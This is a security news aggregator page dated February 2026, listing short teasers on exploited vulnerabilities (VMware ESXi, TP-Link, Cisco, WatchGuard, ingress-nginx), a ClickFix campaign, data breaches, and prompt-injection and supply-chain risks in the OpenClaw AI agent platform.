The Cybersecurity and Infrastructure Security Agency (CISA) has officially added a critical vulnerability affecting VMware ESXi to its Known Exploited Vulnerabilities (KEV) catalog. Tracked as CVE-2025-22225, this zero-day flaw allows attackers to escape security sandboxes. It is currently being leveraged in…
Microsoft to Integrate Sysmon Threat Detection Natively into Windows 11
Microsoft has officially begun rolling out native System Monitor (Sysmon) functionality to Windows 11, marking a significant shift for threat hunters and security operations centers (SOCs). Released via the Windows 11 Insider Preview Build 26300.7733 (Dev Channel) on February 3,…
Cisco Warns of Meeting Management Flaw Enabling Arbitrary File Upload by Remote Attackers
Cisco has released a security advisory detailing a high-severity vulnerability in Cisco Meeting Management (CMM). The flaw, caused by improper input validation, allows authenticated remote attackers to upload arbitrary files and potentially execute commands with root privileges. The vulnerability is located…
Cyberattackers Exploit DNS TXT Records in ClickFix Script to Execute Malicious PowerShell Commands
A new evolution in the “ClickFix” social engineering campaigns, dubbed KongTuke. This latest variant, observed actively since late December 2025, distinguishes itself by leveraging DNS TXT records to stage and retrieve malicious payloads, marking a significant shift in evasion tactics. The “ClickFix” technique…
WatchGuard VPN Client Flaw on Windows Enables SYSTEM‑Level Command Execution
WatchGuard has released a critical security update for its Mobile VPN with IPSec client for Windows to address a privilege escalation vulnerability. The flaw, originating in the underlying software provided by NCP engineering, allows local attackers to execute arbitrary commands…
IT Security News Hourly Summary 2026-02-05 06h : 2 posts
2 posts were published in the last hour 4:7 : Multiple TP-Link OS Command Injection Vulnerabilities Let Attackers Gain Admin Control of the Device 4:7 : CISA Warns of VMware ESXi 0-day Vulnerability Exploited in Ransomware Attacks
Multiple TP-Link OS Command Injection Vulnerabilities Let Attackers Gain Admin Control of the Device
TP-Link has released urgent firmware updates for its Archer BE230 Wi-Fi 7 routers to address multiple high-severity security flaws. These vulnerabilities could allow authenticated attackers to execute arbitrary operating system (OS) commands, effectively granting them complete administrative control over the…
CISA Warns of VMware ESXi 0-day Vulnerability Exploited in Ransomware Attacks
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) recently confirmed that ransomware groups are actively exploiting CVE-2025-22225, a high-severity VMware ESXi sandbox escape vulnerability. This flaw, patched by Broadcom in March 2025, enables attackers to escape virtual machine isolation and…
ISC Stormcast For Thursday, February 5th, 2026 https://isc.sans.edu/podcastdetail/9796, (Thu, Feb 5th)
This post doesn’t have text content, please click on the link below to view the original article. This article has been indexed from SANS Internet Storm Center, InfoCON: green Read the original article: ISC Stormcast For Thursday, February 5th, 2026…
IT Security News Hourly Summary 2026-02-05 03h : 2 posts
2 posts were published in the last hour 2:2 : Betterment – 1,435,174 breached accounts 1:9 : Top AI Tools for Red Teaming in 2026
Betterment – 1,435,174 breached accounts
In January 2026, the automated investment platform Betterment confirmed it had suffered a data breach attributed to a social engineering attack. As part of the incident, Betterment customers received fraudulent crypto-related messages promising high returns if funds were sent to…
Top AI Tools for Red Teaming in 2026
Red teaming has undergone a radical evolution. Modern organizations can no longer rely solely on human creativity or… This article has been indexed from Hackread – Cybersecurity News, Data Breaches, AI and More Read the original article: Top AI Tools…
From Automation to Infection (Part II): Reverse Shells, Semantic Worms, and Cognitive Rootkits in OpenClaw Skills
In part one, we showed how OpenClaw skills are rapidly becoming a supply-chain delivery channel: third-party “automation” that runs with real system access. This second installment expands the taxonomy with five techniques VirusTotal is actively seeing abused through skills, spanning…
IT Security News Hourly Summary 2026-02-05 00h : 3 posts
3 posts were published in the last hour 22:55 : IT Security News Daily Summary 2026-02-04 22:36 : CVE-2025-22225 in VMware ESXi now used in active ransomware attacks 22:6 : OpenClaw or Open Door? Prompt Injection Creates AI Backdoors
IT Security News Daily Summary 2026-02-04
144 posts were published in the last hour 22:36 : CVE-2025-22225 in VMware ESXi now used in active ransomware attacks 22:6 : OpenClaw or Open Door? Prompt Injection Creates AI Backdoors 21:32 : What’s new in post-quantum cryptography in RHEL…
CVE-2025-22225 in VMware ESXi now used in active ransomware attacks
Ransomware groups now exploit VMware ESXi vulnerability CVE-2025-22225, patched by Broadcom in March 2025. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) confirms that ransomware gangs are exploiting the VMware ESXi sandbox escape flaw CVE-2025-22225. The vulnerability is an arbitrary write issue…
OpenClaw or Open Door? Prompt Injection Creates AI Backdoors
Zenity researchers show how indirect prompt injection can turn OpenClaw into a persistent AI backdoor without exploiting a software flaw. The post OpenClaw or Open Door? Prompt Injection Creates AI Backdoors appeared first on eSecurity Planet. This article has been…
What’s new in post-quantum cryptography in RHEL 10.1
In May 2025, Red Hat Enterprise Linux 10 (RHEL) shipped with the first steps toward post-quantum cryptography (PQC) to protect against attacks by quantum computers, which will make attacks on existing classic cryptographic algorithms such as RSA and elliptic curves…
AWS intruder achieved admin access in under 10 minutes thanks to AI assist, researchers say
LLMs automated most phases of the attack A digital intruder broke into an AWS cloud environment and in just under 10 minutes went from initial access to administrative privileges, thanks to an AI speed assist.… This article has been indexed…
IT Gives, Security Takes Away, and Configuration Drift Is the Hidden Cost
There’s an old joke in enterprise tech: IT giveth, and security taketh away. At its best, IT exists to empower people – to give employees faster, better, smarter tools to do their jobs. As we know no good deed goes…
Ingress-Nginx Vulnerability Enables Code Execution in Kubernetes
An ingress-nginx flaw could allow code execution and access to Kubernetes Secrets. The post Ingress-Nginx Vulnerability Enables Code Execution in Kubernetes appeared first on eSecurity Planet. This article has been indexed from eSecurity Planet Read the original article: Ingress-Nginx Vulnerability…
Taiwanese operator of Incognito Market sentenced to 30 years over $105M darknet drug ring
A Taiwanese man was sentenced to 30 years for running Incognito Market, a major darknet drug site that sold over $105 million in illegal drugs. Rui-Siang Lin (24) was sentenced to 30 years in prison for running Incognito Market, a…
Notepad++ Users, You May Have Been Hacked by China
Suspected Chinese state-backed hackers hijacked the Notepadd++ update infrastructure to deliver backdoored version of the popular free source code editor and note-taking app for Windows. This article has been indexed from Security Latest Read the original article: Notepad++ Users, You…
The ‘Absolute Nightmare’ in Your DMs: OpenClaw Marries Extreme Utility with ‘Unacceptable’ Risk
It is the artificial intelligence (AI) assistant that users love and security experts fear. OpenClaw, the agentic AI platform created by Peter Steinberger, is tearing through the tech world, promising a level of automation that legacy chatbots like ChatGPT can’t…